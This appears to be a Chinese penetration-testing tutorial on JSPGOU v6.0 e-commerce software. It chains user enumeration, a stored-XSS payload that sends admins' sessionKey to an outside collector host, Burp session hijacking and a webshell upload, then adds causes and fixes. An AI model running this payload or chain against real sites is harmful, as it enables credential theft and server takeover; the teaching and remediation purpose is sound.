JSPGOU单店版 v6.0 渗透测试教学文档<\/h1>

1. 系统概述<\/h2>

JSPGOU是基于Java技术研发的电子商务管理软件，具有以下特点：<\/p>

强大、稳定、安全、高效、跨平台<\/li>
网站模板统一在后台管理<\/li>
拥有强大、灵活的标签系统<\/li>
用户可自定义显示内容和显示方式<\/li>

适用于大、中、小型企业构建电子商务平台<\/li> <\/ul>

2. 漏洞分析<\/h2>

2.1 用户遍历漏洞<\/h3>

漏洞描述<\/strong>：系统存在用户枚举漏洞，可通过API接口判断用户名是否存在。<\/p>

利用方法<\/strong>：<\/p>

发送GET请求到\/username_unique.jspx<\/code>接口<\/li>
修改username<\/code>参数为目标用户名<\/li>
根据返回结果判断用户是否存在<\/li> <\/ol> 请求示例<\/strong>：<\/p> GET<\/span> \/username_unique.jspx?username=admin HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> demo3.jeecms.com<\/span> <\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) Gecko\/20100101 Firefox\/65.0<\/span> <\/span><\/span>Accept:<\/span> application\/json, text\/javascript, *\/*<\/span> <\/span><\/span>X-Requested-With:<\/span> XMLHttpRequest<\/span> <\/span><\/span><\/code><\/pre>判断依据<\/strong>：<\/p> 返回false<\/code>表示用户存在<\/li> 返回true<\/code>表示用户不存在<\/li> <\/ul> 2.2 前台存储型XSS漏洞<\/h3> 漏洞描述<\/strong>：系统存在存储型XSS漏洞，可窃取管理员sessionKey，进而绕过认证。<\/p> 利用方法<\/strong>：<\/p> 构造恶意JavaScript代码窃取sessionKey<\/li> 将XSS代码注入到系统前台<\/li> 等待管理员访问触发XSS<\/li> <\/ol> JavaScript利用代码<\/strong>：<\/p> var<\/span> website<\/span> =<\/span> "http:\/\/xss.com\/XSS\/"<\/span>; <\/span><\/span>(function<\/span>() { <\/span><\/span> (new<\/span> Image<\/span>()).src<\/span> =<\/span> website<\/span> +<\/span> '\/?keepsession=1&location='<\/span> +<\/span> escape<\/span>((function<\/span>() { <\/span><\/span> try<\/span> { <\/span><\/span> return<\/span> document.location<\/span>.href<\/span> <\/span><\/span> } catch<\/span> (e<\/span>) { <\/span><\/span> return<\/span> ''<\/span> <\/span><\/span> } <\/span><\/span> })()) +<\/span> '&User='<\/span> +<\/span> escape<\/span>((function<\/span>() { <\/span><\/span> try<\/span> { <\/span><\/span> return<\/span> localStorage<\/span>.getItem<\/span>("userName"<\/span>) <\/span><\/span> } catch<\/span> (e<\/span>) { <\/span><\/span> return<\/span> ''<\/span> <\/span><\/span> } <\/span><\/span> })()) +<\/span> '&sessionKey='<\/span> +<\/span> escape<\/span>((function<\/span>() { <\/span><\/span> try<\/span> { <\/span><\/span> return<\/span> localStorage<\/span>.getItem<\/span>("sessionKey"<\/span>) <\/span><\/span> } catch<\/span> (e<\/span>) { <\/span><\/span> return<\/span> ''<\/span> <\/span><\/span> } <\/span><\/span> })()); <\/span><\/span>})(); <\/span><\/span><\/code><\/pre>关键点<\/strong>：<\/p> 系统主要依赖sessionKey<\/code>而非Cookie进行身份验证<\/li> sessionKey<\/code>存储在用户端PC的localStorage中<\/li> 获取到sessionKey<\/code>后可以伪造管理员会话<\/li> <\/ul> 2.3 会话劫持攻击<\/h3> 攻击步骤<\/strong>：<\/p> 获取到管理员的sessionKey<\/code>后<\/li> 使用Burp Suite拦截登录请求<\/li> 替换响应包中的sessionKey<\/code>为获取到的管理员sessionKey<\/code><\/li> 放开Burp Suite拦截，任意账号密码即可登录为管理员<\/li> <\/ol> 关键点<\/strong>：<\/p> 系统对数据包进行了校验，无法直接修改请求包<\/li> 需要通过响应包替换的方式注入sessionKey<\/code><\/li> 系统仅依赖sessionKey<\/code>进行身份验证，不校验Cookie<\/li> <\/ul> 2.4 后台GetShell<\/h3> 漏洞描述<\/strong>：后台存在无限制文件上传漏洞，可直接获取WebShell。<\/p> 利用方法<\/strong>：<\/p> 登录后台（通过前述漏洞获取管理员权限）<\/li> 导航到"界面"->"资源管理"->"上传文件"<\/li> 上传WebShell文件（如JSP木马）<\/li> <\/ol> 优势<\/strong>：<\/p> 无文件类型限制<\/li> 无内容安全检查<\/li> 可直接上传可执行脚本<\/li> <\/ul> 3. 漏洞成因分析<\/h2> 用户枚举<\/strong>：API接口未对用户存在性检查做限制<\/li> XSS漏洞<\/strong>：前端未对用户输入做充分过滤<\/li> 认证缺陷<\/strong>：过度依赖sessionKey<\/code>进行身份验证<\/li> 未正确校验Cookie<\/li> sessionKey<\/code>存储在客户端且可被窃取<\/li> <\/ul> <\/li> 文件上传漏洞<\/strong>：后台未对上传文件做任何安全检查<\/li> <\/ol> 4. 修复建议<\/h2> 用户枚举<\/strong>：<\/p> 统一返回相同的信息（如都返回"true"）<\/li> 增加请求频率限制<\/li> 添加验证码机制<\/li> <\/ul> <\/li> XSS漏洞<\/strong>：<\/p> 对所有用户输入进行HTML实体编码<\/li> 实施严格的CSP策略<\/li> 对输出到页面的数据做XSS过滤<\/li> <\/ul> <\/li> 认证机制<\/strong>：<\/p> 加强Cookie校验<\/li> 不要仅依赖sessionKey<\/code>进行身份验证<\/li> 实现多因素认证<\/li> sessionKey<\/code>应设置HttpOnly和Secure标志<\/li> <\/ul> <\/li> 文件上传<\/strong>：<\/p> 限制上传文件类型<\/li> 检查文件内容<\/li> 上传文件重命名<\/li> 存储在非Web可访问目录<\/li> <\/ul> <\/li> 其他建议<\/strong>：<\/p> 实现完善的日志记录和监控<\/li> 定期进行安全审计<\/li> 保持系统更新到最新版本<\/li> <\/ul> <\/li> <\/ol> 5. 总结<\/h2> JSPGOU v6.0存在多个严重安全漏洞，攻击者可以通过组合利用这些漏洞最终获取系统完全控制权。最关键的漏洞在于系统的认证机制设计缺陷，过度依赖客户端存储的sessionKey<\/code>而忽视其他安全校验机制。建议用户立即采取修复措施，特别是加强认证机制和文件上传限制。<\/p>